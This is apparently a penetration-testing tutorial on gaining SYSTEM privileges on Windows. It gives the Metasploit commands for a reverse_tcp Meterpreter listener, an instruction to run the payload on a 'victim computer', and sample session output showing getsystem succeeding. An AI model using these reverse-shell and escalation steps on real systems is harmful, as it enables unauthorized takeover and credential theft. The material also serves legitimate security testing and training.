GETSYSTEM for Privilege Escalation

Introduction

Acquiring SYSTEM privileges on a Windows system is a crucial task for penetration testers and red teamers, enabling them to carry out advanced post-exploitation actions such as credential extraction and accessing confidential data. The GETSYSTEM command within Meterpreter proves to be a potent tool, empowering attackers to elevate privileges and execute commands at the SYSTEM level.

Step-by-Step Guide

1. Create the meterpreter binary

How-To: Creating a Meterpreter Binary

2. Open Metasploit Console

msfconsole

2. Create and run a listener

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <IP>
msf6 exploit(multi/handler) > set LPORT <PORT>
msf6 exploit(multi/handler) > exploit

3. Execute your meterpreter binary on the victim computer

4. Confirm connection

Sample (run ‘ps’):

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 172.28.99.163:9999
[*] Sending stage (175686 bytes) to 172.28.96.1
[*] Meterpreter session 1 opened (172.28.99.163:9999 -> 172.28.96.1:11322) at 2024-01-24 11:14:18 +1100

meterpreter > ps

Process List
============

 PID   PPID  Name         Arch  Session  User                Path
 ---   ----  ----         ----  -------  ----                ----
 0     0     [System Pro
             cess]
 4     0     System
 224   4     smss.exe
 296   288   csrss.exe
 308   432   svchost.exe
 344   288   wininit.exe
 356   336   csrss.exe
 396   336   winlogon.exe
 432   344   services.exe
 440   344   lsass.exe
 ...

5. Use ‘getsystem’ command to escalate to SYSTEM-leve access

meterpreter > getuid
Server username: WIN-AJ4C67166DE\win7
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Video Demonstration

Reference

https://www.offsec.com/metasploit-unleashed/keylogging/#using-a-keylogger-with-metasploit